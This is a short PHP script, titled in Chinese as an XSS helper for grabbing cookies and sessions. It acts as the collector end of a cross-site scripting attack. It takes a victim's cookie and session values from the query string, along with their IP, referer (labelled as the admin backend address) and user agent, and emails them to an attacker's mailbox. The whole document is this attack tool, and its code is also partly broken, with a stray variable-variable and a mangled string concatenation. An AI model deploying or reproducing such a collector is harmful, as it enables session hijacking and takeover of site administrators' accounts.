xss配合php获取cookie和session的脚本

<?php
$ip = $_SERVER[&#39;REMOTE_ADDR&#39;];
$to=&#39;xxx@yeah.net&#39;;
$referer = $_SERVER[&#39;HTTP_REFERER&#39;];
$cookie = $_GET[&#39;cookie&#39;]; 
$session = $_GET[&#39;session&#39;];
$agent = $_SERVER[&#39;HTTP_USER_AGENT&#39;];
$subject=&#39;远程XSS获取地址-域名：&#39;.$referer;
$body="<p> 远程管理员IP= ".$ip."<p> 访问时间=" . date(&#39;d-m-Y&#39;).
"<p> 后台地址=".$referer."<p> 浏览器类型=".$agent."<p> 当前页面地址=".$referer."<p> COOKIE信息=".$cookie."<p> Session信息=".$$session.&#39; &#39;.
$headers= &#39;MIME-Version: 1.0&#39; . "\r\n";
$headers.= &#39;Content-type: text/html; charset=utf-8&#39; . "\r\n";
$headers.="Cleanreport.com";
mail($to, $subject, $body, $headers);
?>